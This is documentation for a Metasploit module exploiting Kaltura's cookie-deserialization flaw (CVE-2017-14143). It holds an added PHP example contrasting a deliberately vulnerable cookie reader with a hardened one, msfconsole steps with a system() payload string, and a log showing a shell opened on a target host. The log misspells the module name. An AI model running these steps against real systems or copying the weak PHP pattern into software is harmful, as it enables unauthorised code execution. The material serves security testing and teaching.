metasploit-gs/documentation/modules/exploit/linux/http/kaltura_unserialize_cookie_rce.md
2018-01-23 12:44:39 -06:00

Description

The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and execute arbitrary PHP code via a crafted userzone cookie.
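The two flaws named above (a signing key that ships with the code, and object deserialization of the cookie body) are shown here beside a hardened form. This is an added example, not code from Kaltura or from the Metasploit module; the cookie layout, the function names and the `SHIPPED_SECRET` constant are assumptions made for illustration.

```php
<?php
// Added illustration: all names are hypothetical; this is not Kaltura's code.
// Assumed cookie layout: base64( HMAC-SHA256(body) || body ).

const SHIPPED_SECRET = 'identical-in-every-install'; // constructed placeholder

// Weak: the key ships with the source, so a valid signature proves nothing,
// and the "verified" body goes to unserialize(), which builds whatever
// objects the sender described.
function readCookieWeak(string $cookie)
{
    $raw = base64_decode($cookie, true);
    if ($raw === false || strlen($raw) <= 32) {
        return null;
    }
    $body = substr($raw, 32);
    $expected = hash_hmac('sha256', $body, SHIPPED_SECRET, true);
    return hash_equals($expected, substr($raw, 0, 32)) ? unserialize($body) : null;
}

// Hardened: per-install random key passed in from configuration, and a
// data-only decoder (JSON) that cannot instantiate classes.
function readCookieHardened(string $cookie, string $installKey): ?array
{
    $raw = base64_decode($cookie, true);
    if ($raw === false || strlen($raw) <= 32) {
        return null;
    }
    $body = substr($raw, 32);
    $expected = hash_hmac('sha256', $body, $installKey, true);
    if (!hash_equals($expected, substr($raw, 0, 32))) {
        return null;
    }
    $data = json_decode($body, true);
    return is_array($data) ? $data : null;
}

function signCookie(array $data, string $key): string
{
    $body = json_encode($data);
    return base64_encode(hash_hmac('sha256', $body, $key, true) . $body);
}

$installKey = random_bytes(32); // assumption: generated once at install time
$valid  = signCookie(['entry' => 'constructed-sample'], $installKey);
$forged = signCookie(['entry' => 'constructed-sample'], SHIPPED_SECRET);
var_dump(readCookieHardened($valid, $installKey) !== null);  // signed with the install key
var_dump(readCookieHardened($forged, $installKey) === null); // signed with the shipped constant
```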

Vulnerable Application

This module exploits a remote code execution vulnerability in Kaltura (<= 13.1.0) via cookie deserialization. Vulnerability reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14143. Installing Kaltura is difficult, but an installation guide is available here: https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md

Verification Steps

  1. Start msfconsole
  2. use exploit/linux/http/kaltura_unserialize_cookie_rce
  3. set RHOST https://example.com (or IP address)
  4. set ENTRYID 0_xxxxxxxx
  5. set payload generic/custom
  6. set payloadstr "system('command you want to execute, eg.- ls -la');"
  7. run

Scenarios

msf use exploits/linux/http/kaltura_unserialize_cookie_rce
msf exploit(kalkutra_unseialize_cookie_rce) set RHOST 46.101.209.202
RHOST => 46.101.209.202
msf exploit(kalkutra_unseialize_cookie_rce) set LHOST 192.168.1.16
LHOST => 192.168.1.16
msf exploit(kalkutra_unseialize_cookie_rce)>check
[+] 46.101.209.202:4444 The target is vulnerable.
msf exploit(kalkutra_unseialize_cookie_rce)>run
[*] Started bind handler
[*] Output:
[*] Command shell session 1 opened (192.168.1.16:36865 -> 46.101.209.202:4444) at 2017-09-04 12:09:03 +0200

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)